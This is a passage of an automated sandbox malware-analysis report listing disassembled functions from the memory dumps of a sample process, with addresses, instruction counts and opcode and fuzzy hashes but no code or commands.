                                                • Instruction Fuzzy Hash: 66D1AD74E00218CFDB54DFA5C994B9EBBB2BF89300F2481A9D809AB355DB355A82CF50
                                                Function 00607C08 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f12af2c10d5dd231bd5252b982aafa9e962de29d7c59ad1ba5d7bb29fe744947
                                                • Instruction ID: da16f7a490db51cd766b87da1f4a7fb37cd8a55e3e7426eb43671662ef1bc9f8
                                                • Opcode Fuzzy Hash: f12af2c10d5dd231bd5252b982aafa9e962de29d7c59ad1ba5d7bb29fe744947
                                                • Instruction Fuzzy Hash: 70D1AE74E00218CFDB54DFA5C990B9EBBB2BF89300F1481A9D849AB355DB356E86CF50
                                                Function 00600E08 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63f88ebf7ace65efd9a67eca220ce787403f70401bcc4c20029bf3cc72aa08c1
                                                • Instruction ID: e5af34c2ef6f68c06de30a314cb3706c62b1467db2811dc9c40588d076646f02
                                                • Opcode Fuzzy Hash: 63f88ebf7ace65efd9a67eca220ce787403f70401bcc4c20029bf3cc72aa08c1
                                                • Instruction Fuzzy Hash: 6AD19F74E00318CFDB54DFA5D990B9EBBB2BF89300F2481A9D849AB355DB355A82CF50
                                                Function 00606510 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a21ddb97fb5a96841cff498af887b0878ec0255afad874d5e7c0cd649068f52
                                                • Instruction ID: 42fb74dc597dfb0243d3657db9500b9f5d4b8ae3e031a69863d38f00e04ff0da
                                                • Opcode Fuzzy Hash: 0a21ddb97fb5a96841cff498af887b0878ec0255afad874d5e7c0cd649068f52
                                                • Instruction Fuzzy Hash: AED1AF74E00318CFDB54DFA5D990B9EBBB2BF89300F1481A9E809AB355DB355A82CF51
                                                Function 00604E18 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e097ea12d26e8884a35d008eb26e2b612404ed8c204aea15e6ae22c3943265b1
                                                • Instruction ID: 43ba2ef22cd413412e36cf781d0176be5ef8591438aaca3711c336d3f49e6ae4
                                                • Opcode Fuzzy Hash: e097ea12d26e8884a35d008eb26e2b612404ed8c204aea15e6ae22c3943265b1
                                                • Instruction Fuzzy Hash: DCD1AE74E00218CFDB54DFA5C990B9EBBB2FF89300F2481A9D809AB355DB355A82CF50
                                                Function 00605BE0 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2d408c2ae83f81e1164f21133d6402f86e04413e313e0808a0a55bc85ddeed89
                                                • Instruction ID: bd1c78d14586e9eababa62bca0956d21fb259f4f527c53b3b9e97c4ca09d4c88
                                                • Opcode Fuzzy Hash: 2d408c2ae83f81e1164f21133d6402f86e04413e313e0808a0a55bc85ddeed89
                                                • Instruction Fuzzy Hash: C5D1AE74E00318CFDB54DFA5D990B9EBBB2BF89300F1481AAD849AB355DB355A82CF50
                                                Function 006044E8 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ea87c88def2e9cd03e9880d8fe7ee11b50c73842b060ad27594a7549a8b7b18
                                                • Instruction ID: 736b1ff74b939dd832b40c4043c9380c96eea5c3f7ebd85002fe610fbe6adc24
                                                • Opcode Fuzzy Hash: 8ea87c88def2e9cd03e9880d8fe7ee11b50c73842b060ad27594a7549a8b7b18
                                                • Instruction Fuzzy Hash: A0D1AE74E00218CFDB54DFA5D990B9EBBB2BF89300F2481A9D809AB355DB355A82CF50
                                                Function 006032C8 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 85f5f0bd3196ade8d9b4b66536c758f6f3584625cef87f796b0bbee6be106c6c
                                                • Instruction ID: 78445750bf5d8adbf99f73e3186f5e48506b189aa786d3507bb955f2b5ae16a2
                                                • Opcode Fuzzy Hash: 85f5f0bd3196ade8d9b4b66536c758f6f3584625cef87f796b0bbee6be106c6c
                                                • Instruction Fuzzy Hash: F2D19E74E00318CFDB54DFA5D990B9EBBB2BF89300F1481A9D809AB355DB356A82CF51
                                                Function 00601BD0 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fd5d29af15fce851a332262e1bd5d7dbed203206e0293defbd7db6b4f76985e
                                                • Instruction ID: 74516a03e1c6baf818f4d62d6a4b6a550f29672b339c5fb6f1f7235dad6a0e1f
                                                • Opcode Fuzzy Hash: 2fd5d29af15fce851a332262e1bd5d7dbed203206e0293defbd7db6b4f76985e
                                                • Instruction Fuzzy Hash: 7ED1AE74E00318CFEB54DFA5C994B9EBBB2BF89300F1485A9D809AB355DB355A82CF50
                                                Function 006072D8 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 866694e2c0143b7f4ffc168e4b2d307b3d539a8d9f2ad532e753537aa5025ae3
                                                • Instruction ID: 359198ed158e9d61db11caff50f0dd804fb32812d1676f9f382bc85cac99e269
                                                • Opcode Fuzzy Hash: 866694e2c0143b7f4ffc168e4b2d307b3d539a8d9f2ad532e753537aa5025ae3
                                                • Instruction Fuzzy Hash: 14D19E74E00318CFDB54DFA5D990B9EBBB2BF89300F1481A9D809AB355DB356A82CF51
                                                Function 006004D8 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5fd849fa64394c1718d4a0ca292c15c58ea2f93a8914a12f80f0155136ffe12e
                                                • Instruction ID: 86e099bb888b5b8d5e81deccf38842df83db4f70ee02a2544938cb8eb74b3585
                                                • Opcode Fuzzy Hash: 5fd849fa64394c1718d4a0ca292c15c58ea2f93a8914a12f80f0155136ffe12e
                                                • Instruction Fuzzy Hash: 46D1BF74E00318CFEB54DFA5C990B9EBBB2BF89300F1481A9D809AB355DB355A82CF50
                                                Function 006012A0 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3681bfc77422083f762c67e528e26d1b9181560a3fb1dace7916cb909ef5f548
                                                • Instruction ID: ca68597b08a1a99e57c78823645cb585def27f5eec2e6bf643566582fb02bf84
                                                • Opcode Fuzzy Hash: 3681bfc77422083f762c67e528e26d1b9181560a3fb1dace7916cb909ef5f548
                                                • Instruction Fuzzy Hash: 59D1AE74E00218CFDB54DFA5D990B9EBBB2BF89300F1481A9D809AB355DB355A82CF50
                                                Function 006069A8 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e56c580439e0fd334c17344e4b54ee3e4c154e591f9a6b859f1f525bcd3bb4ab
                                                • Instruction ID: ea10f08939cf111a8ab7902eed2171091f6f8df7a7c6d8e9e701d255ce83dbb1
                                                • Opcode Fuzzy Hash: e56c580439e0fd334c17344e4b54ee3e4c154e591f9a6b859f1f525bcd3bb4ab
                                                • Instruction Fuzzy Hash: FBD1AF74E00318CFDB54DFA5D990B9EBBB2BF89300F1481A9E809AB355DB355982CF50
                                                Function 006052B0 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4c973be55a806d7b989c21c8247776fc9f38d8d10983c753e20a52876ce6bf0
                                                • Instruction ID: b3347302bf21dad2b39c993400ab0fb4ef3e6376b486b776983bdce99b47640d
                                                • Opcode Fuzzy Hash: a4c973be55a806d7b989c21c8247776fc9f38d8d10983c753e20a52876ce6bf0
                                                • Instruction Fuzzy Hash: 23D1AE74E00318CFDB54DFA5D990B9EBBB2BF89300F2485A9D809AB355DB355A82CF50
                                                Function 00604980 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0a792de1a970b2a39bb3550937efb99a9c10976d4e4f3c592c5cb922c1bd38f
                                                • Instruction ID: 2c09f4f4428370799650d389127fa81f0844e1947e06606f4ab161c1c6d3a556
                                                • Opcode Fuzzy Hash: f0a792de1a970b2a39bb3550937efb99a9c10976d4e4f3c592c5cb922c1bd38f
                                                • Instruction Fuzzy Hash: 0BD1AE74E00318CFDB54DFA5C994B9EBBB2BF89300F2481A9D809AB355DB355A82CF50
                                                Function 00602998 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8536b1c27b163b029693f372d80dde9ccfc0cf06783d6e7cc48205df1b91ce44
                                                • Instruction ID: c58b3c9158db1d6506ba9a6a0eb4cb904c2a928beccf9483e6f0f43e977bec1e
                                                • Opcode Fuzzy Hash: 8536b1c27b163b029693f372d80dde9ccfc0cf06783d6e7cc48205df1b91ce44
                                                • Instruction Fuzzy Hash: 39D1AE74E00218CFDB54DFA5D994B9EBBB2BF89300F2481A9D809AB355DB355E82CF50
                                                Function 00C3E4E0 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 12d18ec9650680b9252cbd0b7851e650c8c2ba5ddcd6a3fdd7d765a074c9b10a
                                                • Instruction ID: f6c2c58542a49b2175dc9f55e891f4855146415e86712d0573775b9bbd3bdc8b
                                                • Opcode Fuzzy Hash: 12d18ec9650680b9252cbd0b7851e650c8c2ba5ddcd6a3fdd7d765a074c9b10a
                                                • Instruction Fuzzy Hash: 65D1AE74E00218CFDB54DFA5C990B9DBBB2BF89300F1481AAD809AB355DB355A82CF50
                                                Function 00C3F2A8 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2f6ae2b524c214cfbfb47c074bc8bbc2a7f761a0277388b93b0e2bf77e3f2dcc
                                                • Instruction ID: 34fc5834d0fc11a2f83fea6dd4f01e495d12dbbbb8a3d8763c954727e51f518d
                                                • Opcode Fuzzy Hash: 2f6ae2b524c214cfbfb47c074bc8bbc2a7f761a0277388b93b0e2bf77e3f2dcc
                                                • Instruction Fuzzy Hash: 25D1BE74E00318CFDB54DFA5D990B9DBBB2BF89300F2485AAD809AB355DB355A82CF50
                                                Function 00C3F740 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1419abc0cae13eb6e430e87240ac1d640302faa65919ff526c3d713be07e0df5
                                                • Instruction ID: 8d66625a24c1080c5fc3da25b789cecbe2b593abd7b5580e899b1a5190fed422
                                                • Opcode Fuzzy Hash: 1419abc0cae13eb6e430e87240ac1d640302faa65919ff526c3d713be07e0df5
                                                • Instruction Fuzzy Hash: 53D1BE74E00318CFDB54DFA5D990B9DBBB2BF89300F2485AAD809AB355DB355A82CF50
                                                Function 00C3E978 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: efa88b7e8046faf859248ba28e169f8c776a84d64b1510353b8766610ff47554
                                                • Instruction ID: a46165b36f95f87a73fc2af2c55fa9dcd6970d0956e10ddd6b4c389ba2a54d0b
                                                • Opcode Fuzzy Hash: efa88b7e8046faf859248ba28e169f8c776a84d64b1510353b8766610ff47554
                                                • Instruction Fuzzy Hash: 70D19D78E00318CFDB54DFA5D994B9DBBB2BF89300F2481A9D809AB355DB355A82CF50
                                                Function 00C3EE10 Relevance: .3, Instructions: 272COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ca7dc0e91329ade329f172d1721baf23b4db2c8a129008996d9e3dcd4da7d725
                                                • Instruction ID: d60e2b3b6aff51d895a37b1520d2016bd3cc596479e699a0b39b88f7de1e02d1
                                                • Opcode Fuzzy Hash: ca7dc0e91329ade329f172d1721baf23b4db2c8a129008996d9e3dcd4da7d725
                                                • Instruction Fuzzy Hash: D9D1BF78E00318CFDB54DFA5C990B9DBBB2BF89300F1485A9D848AB355DB355A82CF50
                                                Function 00603BF8 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ab0784ac16fc99f201a98216a211a62081420a1d21f8ac16f5d5cd9ab6efa41
                                                • Instruction ID: 1f06719ef15a574df6150dbacae33098e95fbeb55c066120ade302425eadfe22
                                                • Opcode Fuzzy Hash: 7ab0784ac16fc99f201a98216a211a62081420a1d21f8ac16f5d5cd9ab6efa41
                                                • Instruction Fuzzy Hash: 69C1B374E00218CFDB14DFA5C995B9EBBB2BF89301F2085A9D409AB395DB359E81CF50
                                                Function 00C3AEC0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ce11548ab5139619088fc51392e6f25955e17f3e1246086377bbc98269e75906
                                                • Instruction ID: 447ffb690533c3f74ce25ca6a6f7133a852c5a0225b4abf464124b699f9a986a
                                                • Opcode Fuzzy Hash: ce11548ab5139619088fc51392e6f25955e17f3e1246086377bbc98269e75906
                                                • Instruction Fuzzy Hash: D5C1B274E00218CFDB14DFA5C994B9EBBB2BF89300F2485A9D409AB355DB359E81CF50
                                                Function 00C334C8 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f071164a4d2fec410efd273d8fe31bef17ae0df401a09884000dbe0250215ae5
                                                • Instruction ID: 25334ab6ef3f92dc84c96def6b1b2c32f641e70fdcacc70ef87bda7137f3a679
                                                • Opcode Fuzzy Hash: f071164a4d2fec410efd273d8fe31bef17ae0df401a09884000dbe0250215ae5
                                                • Instruction Fuzzy Hash: E6C1B174E00218CFDB54DFA5C994B9DBBB2BF89300F2084AAD409AB395DB359E85CF50
                                                Function 00C3BBC8 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d4f3570a24bae28124dbd54e9bcc01e4e4ee79138361de1e0c7b3e391cb4407d
                                                • Instruction ID: f70473ffefcdda2113ee341a60bf1628180f9b268caa1a018186d216544bbbcb
                                                • Opcode Fuzzy Hash: d4f3570a24bae28124dbd54e9bcc01e4e4ee79138361de1e0c7b3e391cb4407d
                                                • Instruction Fuzzy Hash: 74C1C074E00218CFDB54DFA5C994BADBBB2BF89300F2084AAD409AB355DB359E81CF50
                                                Function 00C3C8D0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2b2868f99ea70f4804c41d3643f03d8413028628ff5ce2e80203347cbd66e338
                                                • Instruction ID: 2884deb111b3dd6aeb41d09a17c2f20e35387a3eb59053160e951b04838795ae
                                                • Opcode Fuzzy Hash: 2b2868f99ea70f4804c41d3643f03d8413028628ff5ce2e80203347cbd66e338
                                                • Instruction Fuzzy Hash: F2C1B174E00218CFDB14DFA5D995B9DBBB2BF89300F2484AAD409AB355DB359E81CF50
                                                Function 00C341D0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4581df3f63bf3217f22d66cbdf8f01b4015e45b94ce86d3a43aaf35a531cf0ff
                                                • Instruction ID: 68bebbfc231e2082049ba125d0f995de0713d2e65409e1169423d9f3a8132030
                                                • Opcode Fuzzy Hash: 4581df3f63bf3217f22d66cbdf8f01b4015e45b94ce86d3a43aaf35a531cf0ff
                                                • Instruction Fuzzy Hash: 00C1B074E00218CFDB54DFA5C994B9DBBB2BF89300F2485AAD409AB355DB35AE81CF50
                                                Function 00C34ED8 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 912defc5312712c9590f70f571af2b063364ef1452ecfa53959cc9c598ede57f
                                                • Instruction ID: 9e2ff498dd50acf7cdc67a4fabe6a23cc2b364dab8cb46eb8b874ecf616afe83
                                                • Opcode Fuzzy Hash: 912defc5312712c9590f70f571af2b063364ef1452ecfa53959cc9c598ede57f
                                                • Instruction Fuzzy Hash: 16C1B174E00218CFDB54DFA5C994B9DBBB2BF89300F2484AAD409AB355DB359E81CF50
                                                Function 00C3D5D8 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0b22d6f483d4fce2c5417ecb598f4b59ff82b69f3dbc9be814cd47c7b3798a90
                                                • Instruction ID: 54d36fb0c9ec0f49bd4b0f84626711b28bfbc20d2bdb1e610fa35acbf0a110f9
                                                • Opcode Fuzzy Hash: 0b22d6f483d4fce2c5417ecb598f4b59ff82b69f3dbc9be814cd47c7b3798a90
                                                • Instruction Fuzzy Hash: B5C1C074E00218CFDB14DFA5D994B9DBBB2BF89300F2084AAD409AB395DB359E85CF50
                                                Function 00C35BE0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 489853ae5f8a2db82d966a9d160c49aec01391a14c409114ac4f5cb9b629969b
                                                • Instruction ID: 3fd6ed0e29163208711607ccc712c43f89021d0d428959b6c4d50ec9759c9af2
                                                • Opcode Fuzzy Hash: 489853ae5f8a2db82d966a9d160c49aec01391a14c409114ac4f5cb9b629969b
                                                • Instruction Fuzzy Hash: 9CC1BF74E00218CFDB14DFA5D994BADBBB2BF89300F2084AAD409AB355DB359E85CF50
                                                Function 00C368E8 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 982116914786df56ae2f837970790e9cf670fd71c4d33a297b0d65c4d7cd71cf
                                                • Instruction ID: a58ad51831b8e22968258676a345cd8a3fe7a79cc14e9167151143a227051286
                                                • Opcode Fuzzy Hash: 982116914786df56ae2f837970790e9cf670fd71c4d33a297b0d65c4d7cd71cf
                                                • Instruction Fuzzy Hash: CCC1BE74E00218CFDB54DFA5C994BADBBB2BF89300F2084AAD409AB355DB359E81CF50
                                                Function 00C375F0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 08497330e2c35263ec9b9cb2b5932b77e8f43bf5f1f960fdccfe98683abcea15
                                                • Instruction ID: 7ced5acbdb2d32b0f5e263e46d085e3556480db5b52b27c68c356f9698015c37
                                                • Opcode Fuzzy Hash: 08497330e2c35263ec9b9cb2b5932b77e8f43bf5f1f960fdccfe98683abcea15
                                                • Instruction Fuzzy Hash: F5C1B074E00218CFDB14DFA5C995B9DBBB2BF89300F2085AAD409AB355DB359E81CF50
                                                Function 00C382F8 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 93a702e74402f2511ed0a4a16f0eb561dd34ef824a29d4eed0a023e7eb06fdc1
                                                • Instruction ID: 460ac2e53d7868cb02d7cf5290e4c57ee268f799f9fc0f0b94043652761eebab
                                                • Opcode Fuzzy Hash: 93a702e74402f2511ed0a4a16f0eb561dd34ef824a29d4eed0a023e7eb06fdc1
                                                • Instruction Fuzzy Hash: 0BC1AF74E00318CFDB54DFA5C995BADBBB2BF89300F2084A9E409AB355DB359A85CF50
                                                Function 00C34A80 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
